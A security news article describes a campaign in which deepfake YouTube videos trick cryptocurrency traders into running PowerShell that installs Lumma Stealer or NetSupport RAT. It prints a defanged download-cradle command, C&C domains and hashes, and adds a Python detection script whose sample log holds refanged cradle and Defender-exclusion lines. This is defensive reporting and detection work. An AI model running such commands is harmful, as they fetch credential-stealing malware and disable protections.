New Wave of ‘Scam-Yourself’ Attacks Utilizing AI-Generated Videos With DeepFake


Feb 19, 2025 - 11:56

A new wave of “Scam-Yourself” attacks leveraging AI-generated deepfake videos and malicious scripts is targeting cryptocurrency enthusiasts and financial traders, marking a dangerous evolution in social engineering tactics.

Discovered by cybersecurity researchers at Gen Digital, this campaign exploits verified YouTube channels, synthetic personas, and AI-crafted payloads to manipulate victims into compromising their own systems.

AI-generated video hosted on YouTube with the ‘Scam-Yourself’ instructions included (Source – GenDigital)

The attacks—which saw a 614% surge in Q3/2024—combine cutting-edge deepfake technology with psychologically tailored lures, raising urgent concerns about the weaponization of generative AI in cybercrime.

The security analysts noted that the operation begins with a deepfake video hosted on a compromised YouTube channel boasting 110,000 subscribers.

The video features a synthetic persona named “Thomas Harris” or “Thomas Roberts,” created using advanced facial animation, voice synthesis, and body movement replication.

Synthetic persona (Source – GenDigital)

Despite the channel’s legitimate appearance—including repurposed content from TradingView—the unlisted tutorial video instructs viewers to activate a fictitious “AI-powered developer mode” that purportedly predicts cryptocurrency market trends with 97% accuracy.

From Deepfakes to PowerShell Payloads

The attack’s core lies in its use of AI-generated scripts designed to bypass suspicion.

Viewers are guided to open Windows’ Run dialog (Win+R) and execute a PowerShell command that fetches a malicious script from paste-sharing sites like Pastefy[.]com or Obin[.]net.

A representative payload decrypted by researchers shows attackers using ChatGPT to refine their code:

iex (New-Object Net.WebClient).DownloadString('hxxps://pastefy[.]com/raw/AbCdE123')  

This script connects to a command-and-control (C&C) server—recently tracked as developer-update[.]dev or developerbeta[.]dev—to deploy Lumma Stealer or NetSupport Remote Access Tool (Figure 2).

Video showing how to insert the (malicious) script into the command prompt (Source – GenDigital)

The former harvests cryptocurrency wallets and browser credentials, while the latter grants full system control. Forensic analysis revealed SHA-256 hashes for key components, including:

  • a5e0635363bbb5d22d5ffc32d9738665942abdd89d2e6bd1784d6a60ac521797 (malicious PowerShell script)
  • 2fe60aa1db2cf7a1dc2b3629b4bbc843c703146f212e7495f4dc7745b3c5c59e (Lumma Stealer variant)

Crucially, the deepfake video hides its artificial nature through procedural details—a synthetic voice explains how to bypass Windows Defender by adding registry exclusions, while on-screen keystrokes mirror authentic TradingView workflows.
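The two observable steps of this campaign, the paste-site download cradle run from the Run dialog and the Defender exclusion the video narrates, are both visible in PowerShell script block logging (Event ID 4104). The following triage script is an added example written for this article, not code from Gen Digital or Cyber Security News; the rule names, the regular expressions and the sample log entries are constructed, while the paste hosts and C&C domains are the ones the article lists, stored defanged exactly as published and refanged only for matching.

```python
import re

def refang(indicator: str) -> str:
    """Turn a defanged indicator as published (hxxp, [.]) back into its matchable form."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")

# Indicators as the article lists them, refanged so they match what a log actually records.
C2_DOMAINS = {refang(d) for d in ("developer-update[.]dev", "developerbeta[.]dev")}
PASTE_HOSTS = {refang(d) for d in ("pastefy[.]com", "obin[.]net")}

# Download cradle: iex/Invoke-Expression consuming a string fetched from the web, in either order.
CRADLE_RE = re.compile(
    r"(?:\biex\b|invoke-expression).*?(?:downloadstring|invoke-restmethod|\birm\b)"
    r"|(?:downloadstring|invoke-restmethod|\birm\b).*?\|\s*(?:\biex\b|invoke-expression)",
    re.IGNORECASE,
)
# The "bypass Windows Defender" step the video narrates: an exclusion added from a script.
EXCLUSION_RE = re.compile(r"add-mppreference\b.*?-exclusion(?:path|process|extension)", re.IGNORECASE)
HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)

def triage(script_block: str) -> list[str]:
    """Reasons a logged PowerShell script block matches this campaign; empty list means no rule fired."""
    reasons = []
    hosts = {h.lower() for h in HOST_RE.findall(script_block)}
    if CRADLE_RE.search(script_block):
        reasons.append("download-cradle")
    if hosts & PASTE_HOSTS:
        reasons.append("paste-site-fetch")
    if hosts & C2_DOMAINS:
        reasons.append("known-c2-domain")
    if EXCLUSION_RE.search(script_block):
        reasons.append("defender-exclusion")
    return reasons

def scan_log(lines: list[str]) -> dict[int, list[str]]:
    """Map line index -> reasons for every script block that triggers at least one rule."""
    return {i: r for i, line in enumerate(lines) if (r := triage(line))}

# Constructed sample script-block entries (not real captures); URL paths are PLACEHOLDER values.
SAMPLE_LOG = [
    r"Get-ChildItem C:\Users\trader\Documents | Measure-Object",
    "iex (New-Object Net.WebClient).DownloadString('https://pastefy.com/raw/PLACEHOLDER')",
    'Add-MpPreference -ExclusionPath "$env:APPDATA\\dev"; Invoke-WebRequest https://developer-update.dev/PLACEHOLDER -OutFile "$env:APPDATA\\dev\\update.bin"',
    "Invoke-RestMethod https://api.example.com/prices | ConvertTo-Json",
]

if __name__ == "__main__":
    for idx, reasons in scan_log(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(reasons)}")
```

The fourth sample shows why the cradle rule requires the fetched string to reach iex/Invoke-Expression: an ordinary Invoke-RestMethod call piped elsewhere does not fire, which keeps the rule usable on hosts where analysts and traders run legitimate API queries.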

Attackers further amplify reach through YouTube’s sponsored ad system, targeting users watching legitimate financial content.

Unlike traditional phishing, victims actively participate in their compromise, believing they’re accessing exclusive tools. With cybercriminals now automating persona creation and script refinement, verifying digital instructions through multiple channels has become a non-negotiable security practice.


The post New Wave of ‘Scam-Yourself’ Attacks Utilizing AI-Generated Videos With DeepFake appeared first on Cyber Security News.